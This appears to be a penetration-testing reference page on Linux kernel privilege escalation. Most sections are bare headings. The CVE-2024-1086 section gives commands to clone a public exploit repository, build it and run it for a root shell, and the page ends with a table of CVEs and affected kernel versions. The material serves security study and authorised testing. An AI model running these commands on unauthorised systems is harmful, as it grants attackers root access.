githubEdit

Linux Kernel Exploits

Modern Linux kernel vulnerabilities and exploitation techniques.

Skill Level: Advanced Prerequisites: C programming, Linux internals, memory corruption basics

Kernel Exploit Landscape

Quick Version Check

# Get kernel version
uname -r
cat /proc/version

# Check for known vulnerabilities
# https://github.com/lucyoa/kernel-exploits
# https://github.com/briskets/linux-exploit-suggester

Recent Critical CVEs

CVE-2024-1086 (nf_tables Use-After-Free)

# Affects: Linux kernel < 6.8
# Type: Use-after-free in netfilter nf_tables
# Impact: Local privilege escalation

# Check if vulnerable
cat /proc/version  # < 6.8
lsmod | grep nf_tables

# Exploit: https://github.com/Notselwyn/CVE-2024-1086
git clone https://github.com/Notselwyn/CVE-2024-1086
cd CVE-2024-1086
make
./exploit

# Expected: Root shell

CVE-2023-32233 (nf_tables Batch Request UAF)

CVE-2023-2640 & CVE-2023-32629 (GameOver(lay))

CVE-2023-0386 (OverlayFS Privilege Escalation)

CVE-2022-0847 (DirtyPipe)

CVE-2022-2588 (route4 UAF)

io_uring Vulnerabilities

Overview

CVE-2024-0582 (io_uring PBUF UAF)

CVE-2023-2598 (io_uring UAF)

Disable io_uring (Mitigation)

eBPF Exploits

Attack Surface

CVE-2023-2163 (eBPF Verifier Bypass)

Mitigation

Container Escape Exploits

CVE-2024-21626 (runc Container Escape)

CVE-2022-0492 (cgroup Escape)

Exploitation Techniques

Heap Exploitation

ROP in Kernel

ret2usr (If No SMEP/SMAP)

Modprobe Path Overwrite

Kernel Protection Bypass

KASLR Bypass

SMEP/SMAP Bypass

Tools

Quick Reference

CVE
Kernel Versions
Type

CVE-2024-1086

< 6.8

nf_tables UAF

CVE-2023-32233

5.1-6.3.1

nf_tables UAF

CVE-2023-2640

Ubuntu specific

OverlayFS

CVE-2023-0386

< 6.2

OverlayFS

CVE-2022-0847

5.8-5.16.11

DirtyPipe

CVE-2022-2588

< 5.19

route4 UAF

Last updated

Was this helpful?